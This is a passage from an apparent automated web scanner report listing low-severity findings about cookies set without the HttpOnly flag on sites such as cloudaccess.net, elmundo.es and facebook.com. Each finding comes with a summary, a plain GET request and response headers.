Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 17:55:06 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.721. https://www.cloudaccess.net/support-sla.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /support-sla.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support-sla.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:47 GMT; path=/
Last-Modified: Mon, 22 Nov 2010 16:52:12 GMT
Expires: Mon, 24 Jan 2011 16:19:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.722. https://www.cloudaccess.net/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cloudaccess.net
Path:   /terms-of-service.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms-of-service.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.3.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:41 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 16:04:40 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 16:04:41 GMT; path=/
Last-Modified: Fri, 02 Jul 2010 09:07:32 GMT
Expires: Mon, 24 Jan 2011 16:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.723. http://www.cycletrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:58:44 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:58:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 93348

<!-- dstolweb09-php5a --><!DOCTYPE html>
<html>
<head>
   <title>Motorcycles - Scooters, Dirt Bikes, Choppers, Sport Bikes, and Other Motorcycles for Sale - Cycle Trader.com</title>
   <meta http-equiv="C
...[SNIP]...

14.724. http://www.dedipower.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dedipower.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

14.725. http://www.digitalia.be/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalia.be
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • 60gp=R477195302; path=/; expires=Thu, 27-Jan-2011 04:19:38 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.digitalia.be
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: 60gp=R477195302; path=/; expires=Thu, 27-Jan-2011 04:19:38 GMT
Date: Mon, 24 Jan 2011 16:04:51 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53983

...<!DOCTYPE html>
<html lang="fr">
<head>
   <meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
   <title>digitalia.be</title>
   <meta name="DC.Language" content="fr" />
   <meta nam
...[SNIP]...

14.726. http://www.dynamicdrive.com/forums/showthread.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicdrive.com
Path:   /forums/showthread.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/showthread.php HTTP/1.1
Host: www.dynamicdrive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:15 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: bbsessionhash=e29c1b7649b3da1e43c63d31de4eefad; path=/; HttpOnly
Set-Cookie: bblastvisit=1295913555; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 24-Jan-2012 23:59:15 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...

14.727. http://www.elmundo.es/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elmundo.es
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elmundo.es
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 25 Jan 2011 05:05:15 GMT
Content-Type: text/html
Connection: close
Cache-Control: no-cache
X-Accel-Cache-Control: no-cache
Set-Cookie: ELMUNDO_idusr=TT5aC8CoFBUAAB8okbI-c2f1049e2d4516c17b18641aef04f3d5; expires=Fri, 24 Jan 2014 05:05:15 GMT; path=/; domain=.elmundo.es
Content-Length: 148754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

14.728. http://www.employmentguide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentguide.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • L=Dallas%2C+TX; path=/;
  • SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
  • BIGipServeremploymentguide_pool=889387786.20480.0000; expires=Tue, 25-Jan-2011 01:59:20 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:59:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
Content-type: text/html
Page-Completion-Status: Normal
Expires: 01/24/11
Pragma: no-cache
cache-control: no-cache
Page-Completion-Status: Normal
Set-Cookie: L=Dallas%2C+TX; path=/;
Set-Cookie: SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
Set-Cookie: BIGipServeremploymentguide_pool=889387786.20480.0000; expires=Tue, 25-Jan-2011 01:59:20 GMT; path=/

...[SNIP]...

14.729. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eraser.ee
Path:   /uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
  • gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...

14.730. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=fYoRD; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=fYoRD; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 30560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.731. http://www.facebook.com/%s

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /%s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=NgpY2; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NgpY2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:49 GMT
Content-Length: 11704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.732. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=wYDCq; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wYDCq; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 11725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.733. http://www.facebook.com/7NEWS

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /7NEWS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=aYRu9; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /7NEWS HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=aYRu9; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:40 GMT
Content-Length: 174522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.734. http://www.facebook.com/LIMEprpromo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LIMEprpromo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=Tpmq1; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LIMEprpromo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Tpmq1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 155797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

14.735. http://www.facebook.com/abid.bahloul

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /abid.bahloul

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • lsd=6G7wO; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /abid.bahloul HTTP/1.1
Host: www.facebook.com
Accept: */*
